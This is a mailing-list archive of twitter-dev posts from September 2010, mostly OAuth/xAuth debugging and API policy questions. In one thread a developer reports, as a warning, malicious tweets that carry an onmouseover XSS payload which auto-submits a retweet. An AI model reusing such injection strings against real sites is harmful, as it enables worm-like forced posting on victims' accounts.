[twitter-dev] Re: Authorizing for partial control

2010-09-21 Thread Papa.Coen
Of course, Twitter is not a secure means of communication. You know that, I know that. How about the majority of Twitter users? I think you could imagine the personal harm you could get from insulting tweets, spamming on your behalf or even setting pornographic images as your avatar. People are

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Hello Tom, unfortunately, it still doesn´t work. When my basestring does not include x_auth_password and x_auth_username I don´t get an successfull response? Now I am doing it as it is described in the documentation on http://dev.twitter.com/pages/xauth. I get an successfull Response with

[twitter-dev] Status Updates

2010-09-21 Thread Goran Popovic
Hello! I have a delicate question about status updates. Is it against the Twitter TOS to send tweet every time script finds another candidate? Let me explain more.. Few days ago I've created a website called hottwittz.com. Script finds users who said that they are hot / sexy, and allows users to

[twitter-dev] XAuth - bad request

2010-09-21 Thread Gary
Hello, I am developing a desktop application using C++ and QT. (I'm not using QAuth because I don't want to have to encorporate QCA and OpenSLL into my app.) I am attempting to perform xAuth and I'm getting 400 (bad request). Here are the details (data taken from

[twitter-dev] Is it possible to use multiple keywords in Search Widget ?

2010-09-21 Thread imsc imsc
Hi, Suppose I have two keywords: A and B. Is it possible to search both keywords? For example, after the search in the result I want to see the tweets that have only A, only B or both A and B. Thank you so much -- Twitter developer documentation and resources: http://dev.twitter.com/doc API

[twitter-dev] direct_messages/new.json is not working?

2010-09-21 Thread Tzanko
Hello, I am wondering if there is an issue with direct_messages/new? Regardless of what I POST, I get Incorrect signature. At the same time I am able to successfully POST request to /statuses/ update.json. I used exactly the same code, except for changing the URL and removing screen_name and

Re: [twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread Tom van der Woerdt
The problem is that you are confusing xAuth and OAuth. xAuth is only https://api.twitter.com/oauth/access_token, allowing you to exchange username/password for oauth_token and oauth_token_secret. OAuth only needs those two keys, not your username or password. (I would recommend that you read the

Re: [twitter-dev] Status Updates

2010-09-21 Thread Tom van der Woerdt
As far as I know, that's no problem - a lot of services do that. Just don't make it spammy (sending more than 1 tweet per week to one user without first getting his/her permission, etc) and allow users to opt-out (better even would be opt-in but that wouldn't be good for your service, right?).

Re: [twitter-dev] direct_messages/new.json is not working?

2010-09-21 Thread Tom van der Woerdt
Works fine here. Tom On 9/21/10 7:03 AM, Tzanko wrote: Hello, I am wondering if there is an issue with direct_messages/new? Regardless of what I POST, I get Incorrect signature. At the same time I am able to successfully POST request to /statuses/ update.json. I used exactly the same

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Hello again, I gerausgefunden that I need to create a new Response xauth after signing with my access_token. And I have a new basestring, looks like this: GEThttp%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses %2Ffriends_timeline.xmloauth_consumer_key%3D.%26oauth_nonce

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Hello again, I gerausgefunden that I need to create a new Response xauth after signing with my access_token. And I have a new basestring, looks like this: GEThttp%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses %2Ffriends_timeline.xmloauth_consumer_key%3D.%26oauth_nonce

Re: [twitter-dev] XAuth - bad request

2010-09-21 Thread Tom van der Woerdt
First, let me start by saying that xAuth is only an extension to OAuth and that you will have to implement OAuth as well. The problem with your request is that you send all oauth_* parameters as header. That's wrong: the correct syntax is Authorization: OAuth oauth_nonce=nonce,

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Hello again, I gerausgefunden that I need to create a new Response xauth after signing with my access_token. And I have a new basestring, looks like this: GEThttp%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses %2Ffriends_timeline.xmloauth_consumer_key%3D.%26oauth_nonce

Re: [twitter-dev] Is it possible to use multiple keywords in Search Widget ?

2010-09-21 Thread Tom van der Woerdt
A OR B (you need to capitalize the OR though) Tom On 9/21/10 4:00 AM, imsc imsc wrote: Hi, Suppose I have two keywords: A and B. Is it possible to search both keywords? For example, after the search in the result I want to see the tweets that have only A, only B or both A and B. Thank

Re: [twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread Tom van der Woerdt
Your Base String seems fine and the parameters in your URL look fine as well. However, like I said: try executing the request with code, not in your browser. That, and I'm not entirely sure about how Twitter's OAuth implementation works. You may have to send the oauth_* parameters in the

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
It works, thanks for your help! On 21 Sep., 11:17, andy andreas-wilkeme...@andreazw.de wrote: Hello again, I gerausgefunden that I need to create a new Response xauth after signing with my access_token. And I have a new basestring, looks like this:

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
It works, thanks for your help! On 21 Sep., 11:17, andy andreas-wilkeme...@andreazw.de wrote: Hello again, I gerausgefunden that I need to create a new Response xauth after signing with my access_token. And I have a new basestring, looks like this:

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Why all the German words? Because I come from Germany! Viele Grüße On 21 Sep., 11:29, andy andreas-wilkeme...@andreazw.de wrote: It works, thanks for your help! On 21 Sep., 11:17, andy andreas-wilkeme...@andreazw.de wrote: Hello again, I gerausgefunden that I need to create a new

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Why all the German words? Because I come from Germany! Viele Grüße On 21 Sep., 11:29, andy andreas-wilkeme...@andreazw.de wrote: It works, thanks for your help! On 21 Sep., 11:17, andy andreas-wilkeme...@andreazw.de wrote: Hello again, I gerausgefunden that I need to create a new

[twitter-dev] New twitter.com uses an OAuth app called web?

2010-09-21 Thread Karthik
Just read from this blog post (http://engineering.twitter.com/2010/09/ tech-behind-new-twittercom.html), that new Twitter.com is a client to Twitter API. I can't help but wonder if, 1) Twitter.com uses an OAuth app called web? 2) Does the site generate OAuth access tokens for every user from

Re: [twitter-dev] New twitter.com uses an OAuth app called web?

2010-09-21 Thread Tom van der Woerdt
There are no OAuth_* parameters when making requests to api.twitter.com. However, I do see a lot of cookies, including auth_token and twitter_sess. I would assume that these are related. It's definitely not OAuth 1.0 :-) Tom On 9/21/10 11:56 AM, Karthik wrote: Just read from this blog post

[twitter-dev] Re: get Frienfstimeline after connection with xAuth

2010-09-21 Thread andy
Why all the German words? Because I come from Germany! Viele Grüße On 21 Sep., 11:29, andy andreas-wilkeme...@andreazw.de wrote: It works, thanks for your help! On 21 Sep., 11:17, andy andreas-wilkeme...@andreazw.de wrote: Hello again, I gerausgefunden that I need to create a new

Re: [twitter-dev] Re: Authorizing for partial control

2010-09-21 Thread M. Edward (Ed) Borasky
Yes, that's why one does the right thing *and* has an attorney. ;-) -- M. Edward (Ed) Borasky http://borasky-research.net http://twitter.com/znmeb A mathematician is a device for turning coffee into theorems. - Paul Erdos Quoting Papa.Coen papa.c...@gmail.com: Of course, Twitter is not a

[twitter-dev] Re: Status Updates

2010-09-21 Thread Goran Popovic
They are notified once and that's it ;) Well I got an idea to notify users lets say each 10 minutes ( ie. 100 users found today..and instead of notifying them immediately when they are found ..they would be added in a database..and then notified one by one every few minutes). I think that would

Re: [twitter-dev] Re: Status Updates

2010-09-21 Thread Tim Haines
Hi, I have a bot that does something similar to this. If you do 100 spread out over the course of a day you'll be fine. If you did 100 in the course of an hour, Twitter would (very likely) suspend your account. They have monitoring in place for when certain thresholds are crossed, but they

[twitter-dev] xAuth problem

2010-09-21 Thread privatejava
Since many days i can see my xAuth is not working .It gives me error/ exception while i try to login my twitter user via xauth method.My application is a standalone app with api twitter4j.I've even already verified my xAuth but why isn't it working? Please help! -- Twitter developer

[twitter-dev] onmouseover

2010-09-21 Thread John Meyer
Any updates? http://www.theatlantic.com/technology/archive/2010/09/stay-off-twittercom-until-further-notice/63303/ -- Twitter developer documentation and resources: http://dev.twitter.com/doc API updates via Twitter: http://twitter.com/twitterapi Issues/Enhancements Tracker:

Re: [twitter-dev] onmouseover

2010-09-21 Thread Cameron Kaiser
Any updates? http://www.theatlantic.com/technology/archive/2010/09/stay-off-twittercom-until-further-notice/63303/ Clever little exploit, looking at it (safely from TTYtter, natch). -- personal: http://www.cameronkaiser.com/ -- Cameron Kaiser *

[twitter-dev] XSS Forgeries

2010-09-21 Thread Fabian Schlenz
Hello. There are some malicious tweets coming through in my timeline. The texts of these tweets are for example: http://a.no/@onmouseover=;$('textarea:first').val(this.innerHTML);$('.status-update-form').submit() style=color:#000;background:#000;/ or

Re: [twitter-dev] New twitter.com uses an OAuth app called web?

2010-09-21 Thread Thomas Woolway
If it's built on top of @anywhere, it will use OAuth 2.0. Tom On Tue, Sep 21, 2010 at 11:01 AM, Tom van der Woerdt i...@tvdw.eu wrote: There are no OAuth_* parameters when making requests to api.twitter.com. However, I do see a lot of cookies, including auth_token and twitter_sess. I would

Re: [twitter-dev] New twitter.com uses an OAuth app called web?

2010-09-21 Thread Tom van der Woerdt
Which would mean that OAuth 2.0 is now available for the API? Tom On 9/21/10 3:02 PM, Thomas Woolway wrote: If it's built on top of @anywhere, it will use OAuth 2.0. Tom On Tue, Sep 21, 2010 at 11:01 AM, Tom van der Woerdt i...@tvdw.eu mailto:i...@tvdw.eu wrote: There are no

[twitter-dev] Send direct Message with xAuth

2010-09-21 Thread andy
Hello I have problems to send a new Direct Message. I use xAuth to authentification to Twitter. I get an successful response with oauth_token and oauth_token_secret. After this I send a request to get the friends Timeline. This I get returned, as I with a new basestring and a new key (consumer

[twitter-dev] Re: Stream api statuses/filter no catching my hashtag

2010-09-21 Thread Nicolas Grasset
Thanks for the quick reply! I went back to testing with command line with a curl call, it worked so I realized the PHP code was buffering and I did not realize it on large amount of results... The problem was with an internal buffer between cURL and the PHP Stream. I went another way instead and

Re: [twitter-dev] Send direct Message with xAuth

2010-09-21 Thread Tom van der Woerdt
Again: that's no xAuth, that's OAuth. The issue here: there's no oauth_token present. Tom On 9/21/10 3:11 PM, andy wrote: Hello I have problems to send a new Direct Message. I use xAuth to authentification to Twitter. I get an successful response with oauth_token and oauth_token_secret.

[twitter-dev] Re: Send direct Message with xAuth

2010-09-21 Thread andy
And how should we proceed with xauth? On 21 Sep., 15:14, Tom van der Woerdt i...@tvdw.eu wrote: Again: that's no xAuth, that's OAuth. The issue here: there's no oauth_token present. Tom On 9/21/10 3:11 PM, andy wrote: Hello I have problems to send a new Direct Message. I use xAuth to

Re: [twitter-dev] Re: Send direct Message with xAuth

2010-09-21 Thread Tom van der Woerdt
xAuth is only for the credentials exchange process. It's not possible to do this with just xAuth. Tom On 9/21/10 3:15 PM, andy wrote: And how should we proceed with xauth? On 21 Sep., 15:14, Tom van der Woerdt i...@tvdw.eu wrote: Again: that's no xAuth, that's OAuth. The issue here:

Re: [twitter-dev] Re: Stream api statuses/filter no catching my hashtag

2010-09-21 Thread John Kalucki
Why are you writing your own PHP Streaming API client? It's somewhat complicated to get all the details right. The Phirehose library seems to be well received, and it's incorporated lots of fixes for corner cases. -John Kalucki http://twitter.com/jkalucki Twitter, Inc. On Tue, Sep 21, 2010 at

Re: [twitter-dev] onmouseover

2010-09-21 Thread Taylor Singletary
Patched: http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched On Tue, Sep 21, 2010 at 5:46 AM, Cameron Kaiser spec...@floodgap.com wrote: Any updates? http://www.theatlantic.com/technology/archive/2010/09/stay-off-twittercom-until-further-notice/63303/ Clever little

Re: [twitter-dev] XSS Forgeries

2010-09-21 Thread Taylor Singletary
Patched: http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched Thanks for the warning. Taylor On Tue, Sep 21, 2010 at 5:21 AM, Fabian Schlenz m...@fabianonline.de wrote: Hello. There are some malicious tweets coming through in my timeline. The texts of these tweets

[twitter-dev] Twitter count not working

2010-09-21 Thread Oscar Migueis
Our conter returns to 0 when i refresh the page. Even at http://dev.twitter.com/pages/tweet_button if i test it and refresh, it returns to 12 tweets. -- Twitter developer documentation and resources: http://dev.twitter.com/doc API updates via Twitter: http://twitter.com/twitterapi

[twitter-dev] problems with 2000 followers barrier

2010-09-21 Thread ValeZ
Hi, developers My blog service www.liveinternet.ru (up to 1 500 000 blogs) recently have developed the integration with twitter. Our users fix their twitter accounts by OAuth and every message in twitter adds in their blogs. Our account @liveinternet_ru automatically follow users' accounts,

Re: [twitter-dev] xAuth problem

2010-09-21 Thread Taylor Singletary
Hi there, Has anything changed about your environment? Perhaps your clocks have changed and you aren't generating valid timestamps? When you applied and were approved for xAuth, was it a conditional approval meant for transitional purposes? Have you tried utilizing xAuth from another code base?

Re: [twitter-dev] Re: Status Updates

2010-09-21 Thread Taylor Singletary
The best way to avoid running afoul of Twitter's spam policies as an API developer is to follow a golden rule: don't surprise users. Automating an @mention because your algorithm determined something interesting about the user (as opposed to another user of your service deliberately triggering the

[twitter-dev] Local trends near you user setting via API?

2010-09-21 Thread TheGuru
Is there a way yet, via the api, to determine if a user has set their trends to display for specific locale, versus worldwide? In my searching, I came across the following post back in January, stating that the setting would be included in the user object, but I'm not seeing anything yet:

Re: [twitter-dev] problems with 2000 followers barrier

2010-09-21 Thread Adam Cloud
http://support.twitter.com/entries/68916 http://support.twitter.com/entries/66885-i-can-t-follow-people-follow-limitsMaybe ask some of users to follow you back to prove your the legitimacy of your app. 2010/9/21 Валентин ValeZ Любимов valentin.lyubi...@gmail.com Hi, developers My blog

[twitter-dev] Whitelist status update

2010-09-21 Thread Tom Monaghan
Hi folks, We applied a few weeks ago and are looking for an update. We're making sure to stay under the present limits, but are inching closer by the day and having to curtail growth of our app based on this ceiling. On 8/17 in reply to a similar request Taylor Singletary mentioned that you

[twitter-dev] Search API is acting weird.

2010-09-21 Thread Gena01
So I've been messing with the search API and I am seeing some strange stuff going on. When I request: http://search.twitter.com/search.json?q=to:ev I get normal results. If i request http://search.twitter.com/search.json?q=to:a or http://search.twitter.com/search.json?q=to:gena01 then I get a

Re: [twitter-dev] Twitter count not working

2010-09-21 Thread Matt Harris
Hi Oscar, Could you share the code you are using for your Tweet Button so we can try and work out what's happening. Thanks, Matt On Tue, Sep 21, 2010 at 7:39 AM, Oscar Migueis omigu...@gmail.com wrote: Our conter returns to 0 when i refresh the page. Even at

[twitter-dev] Re: XAuth - bad request

2010-09-21 Thread Gary
Thank you. Now it works. So what is needed was a single HTTP header with name Authorization and value is the comma delimited string with quoted values as shown in the example. In other words... POST /oauth/authorize HTTP/1.1 Authorization: OAuth

[twitter-dev] Re: Search API is acting weird.

2010-09-21 Thread themattharris
The adjusted since_id to xxx due to temporary error really means this: the since_id was not specified so I went back as far as I could. The earliest tweet is the database was 25075604044 so i used that. For users who tweet more often this error can still occur but is less likely. This is

Re: [twitter-dev] New twitter.com uses an OAuth app called web?

2010-09-21 Thread Abraham Williams
I poked around how @Anywhere authenticates and makes request and put the results up on my blog: http://blog.abrah.am/2010/09/hacking-twitter-anywheres.html Abraham - Abraham Williams | Hacker Advocate | http://abrah.am @abraham | http://projects.abrah.am | http://blog.abrah.am This

Re: [twitter-dev] Local trends near you user setting via API?

2010-09-21 Thread Abraham Williams
For users with the #newtwitter yes. But it is currently undocumented and not yet officially supported. http://app.apigee.com/console/apigee-console-snapshots-128331720_14a0ad88-4e01-4b1e-9af2-0f6e1280a3b1/rendersnapshotview Abraham - Abraham Williams | Hacker Advocate |

[twitter-dev] @anywhere rocks for Javascript development

2010-09-21 Thread ManuelZ
It's simple; it feels like jQuery; gives you the basics instantly. -- Twitter developer documentation and resources: http://dev.twitter.com/doc API updates via Twitter: http://twitter.com/twitterapi Issues/Enhancements Tracker: http://code.google.com/p/twitter-api/issues/list Change your

[twitter-dev] dev.twitter.com sends consumer secret in clear text

2010-09-21 Thread ManuelZ
When you register your Twitter app at http://dev.twitter.com, you get an api key, a consumer secret and other awesome goodies. The secret is necessary so that you can validate signatures of stuff coming from Twitter (confirm it's from Twitter) and generate signatures for stuff you're sending to

Re: [twitter-dev] Whitelist status update

2010-09-21 Thread Taylor Singletary
Hi Tom, Still inexcusably, chronically, and hilariously behind on processing whitelisting requests. If anyone has a whitelisting request they feel has been lost in time, feel free to send me ( taylorsinglet...@twitter.com ) a note with the screen name you filed the request under. I don't mind

Re: [twitter-dev] Whitelist status update

2010-09-21 Thread Trevor Dean
Hi Taylor, We are just preparing our whitelist request form. Is there anything we can do or any advice you can give on getting our request reviewed sooner than later? Thanks, Trevor On Tue, Sep 21, 2010 at 1:56 PM, Taylor Singletary taylorsinglet...@twitter.com wrote: Hi Tom, Still

Re: [twitter-dev] Whitelist status update

2010-09-21 Thread Taylor Singletary
Hi Trevor, There's nothing specific you can do to ensure that it gets reviewed sooner than later -- if you like, you can send me an email after you've submitted the review and I may give it some advance consideration. To be clear: the vast majority of whitelisting requests are denied. An

[twitter-dev] Re: Using @Anywhere under SSL

2010-09-21 Thread Cassie Lynn
yet? Do we have any way of knowing when this might happen? And thanks for asking this here Justin! I asked on @anywhere and no one has replied (it has been almost a week). Thanks! - Cassie On Sep 20, 5:00 am, Tom van der Woerdt i...@tvdw.eu wrote: FYI, there's a Mailing List specifically for

Re: [twitter-dev] Re: Using @Anywhere under SSL

2010-09-21 Thread Taylor Singletary
Hi Cassie, We don't have any estimates on when SSL support will be enabled for @Anywhere. Taylor On Tue, Sep 21, 2010 at 12:37 PM, Cassie Lynn cassie.schwendi...@gmail.com wrote: yet? Do we have any way of knowing when this might happen? And thanks for asking this here Justin! I asked on

[twitter-dev] statuses/update returns Incorrect signature when using in_reply_to_status_id

2010-09-21 Thread Tzanko
Hello, When I post to statuses/update with in_reply_to_status_id parameter, I get Incorrect signature. However, statuses/update works fine when in_reply_to_status_id is missing. Could someone please help? How do we need to pass this parameter? Thank you in advance! -- Twitter developer

Re: [twitter-dev] statuses/update returns Incorrect signature when using in_reply_to_status_id

2010-09-21 Thread Tom van der Woerdt
You most likely forget to include in_reply_to_status_id in your Base String. Tom On 9/21/10 10:38 PM, Tzanko wrote: Hello, When I post to statuses/update with in_reply_to_status_id parameter, I get Incorrect signature. However, statuses/update works fine when in_reply_to_status_id is

Re: [twitter-dev] statuses/update returns Incorrect signature when using in_reply_to_status_id

2010-09-21 Thread Taylor Singletary
Can you share what the various states are in your request? To save some time, here's an example of a few steps of updating a status in this way. This example replies to tweet 23241674011 with the status @oauth_dancer test Signature Base String

Re: [twitter-dev] Re: Status Updates

2010-09-21 Thread Scott Wilcox
Hi, I'd second that completely. Users *really* dislike finding messages directed to/at them for keyword tracking. The first thing I do is block and report that account for spam. Its one of my pet peeves regarding the streaming api/tracking. Scott. On 21 Sep 2010, at 16:00, Taylor Singletary

Re: [twitter-dev] Status Updates

2010-09-21 Thread Scott Wilcox
Hi, If I came across your app doing that, I'd block it and then report it as spam immediately. In my opinion, you're spamming via @replies - the reason for doing so it irrelevant. I'd imagine your app getting shut down pretty quickly. Scott. On 21 Sep 2010, at 07:44, Goran Popovic wrote:

Re: [twitter-dev] statuses/update returns Incorrect signature when using in_reply_to_status_id

2010-09-21 Thread Tzanko Stefanov
Great - works now! Thank you very much! I am wondering why such 'intricacies' are not mentioned in the documentation. I mean, how can one figure out the the optional parameter in_reply_to_status_id has to come in front of the oauth parameters in the base string? Or maybe there is some sort of a

[twitter-dev] Perl Net::Twitter and oAuth

2010-09-21 Thread sftriman
I downloaded the /examples in Net::Twitter, and they don't seem to work. There were 2 in that directory. I've searched tons on Google, and I've read both links on the dev.twitter.com site for perl, but can't get those to work. Maybe someone here can help? My Twitter code does only a few

[twitter-dev] Searching for tweets containing a specific domain

2010-09-21 Thread Eric Marcoullier @ Gnip
If you query search.twitter.com for a specific domain, such as techcrunch.com, you'll get a list of all tweets that contain that domain, even if it's contained in a shortened URL. Using domains as predicates in Streaming Track doesn't result in the same behavior, only matching on actual body text

RE: [twitter-dev] Twitters t.co URL

2010-09-21 Thread james ---------------
Hi Taylor, The problem seemed to have resolved itself . I deleted the postings where the tiny urls where missing. It must have been a glitch. Although would like to know any possible reasons for this for future reference. Regards, Michael From:

[twitter-dev] Re: problems with 2000 followers barrier

2010-09-21 Thread Jonathan Strauss
This is how we architected the first version of TweetPo.st back before the streaming API was available. It was a good workaround for regularly polling the accounts of all our users individually to know if they had tweeted. However, we ran into the same issue with the follower/following ratio. The

[twitter-dev] Re: 503s On Geo API

2010-09-21 Thread Clay Graham
Just talked to the twitter api people. Looks like there was a bug that they fixed! Clay On Sep 20, 8:22 pm, Clay Graham claytan...@sightlyinc.com wrote: Hey all! I wanted to check in with the community before writing a...@twitter.com, just so I dont look like a fool I am hoping to pick

Re: [twitter-dev] xAuth problem

2010-09-21 Thread Narayan Maharjan
Hello Taylor, I 've already checked my timestamp before couple of days. The exception occurs on all of the user who are using my application.So I think it may be due to my own application. I use twitter4j api. It shows exception every time i try to login. Please help. Thanks. On Tue, Sep 21,

Re: [twitter-dev] Perl Net::Twitter and oAuth

2010-09-21 Thread Marc Mims
* sftriman dal...@gmail.com [100921 16:46]: I downloaded the /examples in Net::Twitter, and they don't seem to work. There were 2 in that directory. I've searched tons on Google, and I've read both links on the dev.twitter.com site for perl, but can't get those to work. Maybe someone here